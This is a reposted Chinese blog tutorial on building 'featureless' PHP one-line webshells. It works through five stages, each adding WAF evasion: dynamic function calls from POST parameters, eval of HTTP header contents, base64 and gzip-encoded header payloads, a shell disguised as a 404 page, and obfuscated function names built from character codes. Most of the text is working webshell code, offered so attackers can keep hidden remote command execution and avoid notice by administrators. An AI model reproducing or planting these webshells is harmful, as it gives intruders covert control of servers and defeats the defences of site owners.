(转)无特征过狗一句话猥琐思路

0×01  姿势一

我们知道PHP动态函数很有意思,那么你猜到了,姿势一就是:

<?php$_POST['xx']($_POST['oo']);?>

注意XX参数设置成EVAL是不行的哦,让我们来看看效果:

 

0×02  姿势二

关键词是过滤了,但是你老是交一些奇奇怪怪的东西,人家几万块买的WAF也不是吃白饭的啊。好好好你丑你说什么都是对的,我们不交了,getallheaders函数能够获取请求头内容,来试试新家伙:

<?phpeval(getallheaders()['Accept-Language']);>

当然你要是猥琐到这样,那恭喜你,你已经学会举一反三了...

<?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);>

 

0×03  姿势三

遇到一般的waf可能上个姿势就能绕过,但是还是会有一些臭不要脸的waf会检测http请求头里的内容,咱们还是从技术角度出发来看看这个问题怎么绕过,猥琐的人可能首先想到了的base64,更猥琐的人可能想到了各种自写函数进行编码,替换,但是我见过最猥琐的思路是gzuncompress和gzcompress函数,话不多说我们先放壳:

<?phpeval(gzuncompress(base64_decode(getallheaders()['xx'])));>

http头部的里面的xx字段看起来像base64编码(其实实他就是base64编码),但是解开之后发现是乱码,waf识别不出来里面的内容,哈哈是不够够猥琐呢..如果你要是还没不够猥琐,那么来吧,互相伤害吧:

<?php$xx=gzuncompress(base64_decode(getallheaders()['xx']));$xx(gzuncompress(base64_decode(getallheaders()['oo'])));>

0x04  姿势四

目前为止,这个壳在传输过程中已经没有任何特征了,但是管理员毕竟是吃白饭的,某日浏览小黄文可能无意间发现你的壳,一堆什么莫名的的base64函数和查了半天资料也搞不懂的gzuncompress函数,管理员手一抖说不定就给删了呢,这时候你需要伪装你的壳,伪装成404是个比较安全的方法,为了防止管理员访问壳时出现未提交相应的http header导致php报错,我们再加上如果判断,完整的shell如下:

<!DOCTYPE HTMLPUBLIC"-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

...

<?php

$xx=getallheaders()['xx'];

$oo=getallheaders()['oo'];

if($xx!=""and$oo!=""){

$xx=gzuncompress(base64_decode($xx));$xx(gzuncompress(base64_decode($oo)));

}

> 

</body></html>

 

0x05  姿势五

可能你厌倦了每次提交数据都需要进行手动编码再提交。技术的目的本身就是机器代替手工,那好用蟒来写一个我们专属的一句话控制端吧。不过在这之前我们需要再此改进我们的外壳,使其变得更加隐蔽,更加实用最新版的外壳如下:

<!DOCTYPE HTMLPUBLIC"-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p><?php

//ZUp4THFyVHl5eS9LVGN5ckF3QVZGZ1Av;

$error0="404_not_found";

$error1="400_not_found";

$error2="302_not_found";

...

$_="x6dx64x35";

$__=$_($_.$_.$_);

$header_errors=chr(103).substr($__,14,1)."t".chr(97)."llh".substr($__,14,1)."aders";

$base_errors=chr(98)."x61".chr(115).substr($__,14,1)."6"."x34"."_".chr(100)."x65"."c".chr(111)."d".substr($__,14,1);

$gz_errors="x67x7a".chr(117).chr(110)."com"."x70x72x65x73x73";

if($header_errors()[$error1]!=""and$header_errors()[$error2]!=""){

echo$error0;

$error=$gz_errors($base_errors($base_errors($header_errors()[$error2])));$error($gz_errors($base_errors($base_errors($header_errors()[$error1]))));

echo$error0;}>

</body></html>

我们看到其实和上个姿势的差别主要是加了一些混淆,像的base64,gzuncompress等这些函数都进行了动态组合,更具有迷惑性,另外执行命令前后分别有一次回波进行输出,这主要是方便我们的一句话客户端在获取服务器相应内容后能够利用正则截取真正的执行结果,而不是多了一些其他的HTML之类的没用的内容。

附下我们客户端的执行效果:

 

PS:客户端目前只写了个小框架,后面功能稍微完善点之后会放给大家玩的。

原文地址:https://www.cnblogs.com/backlion/p/7015724.html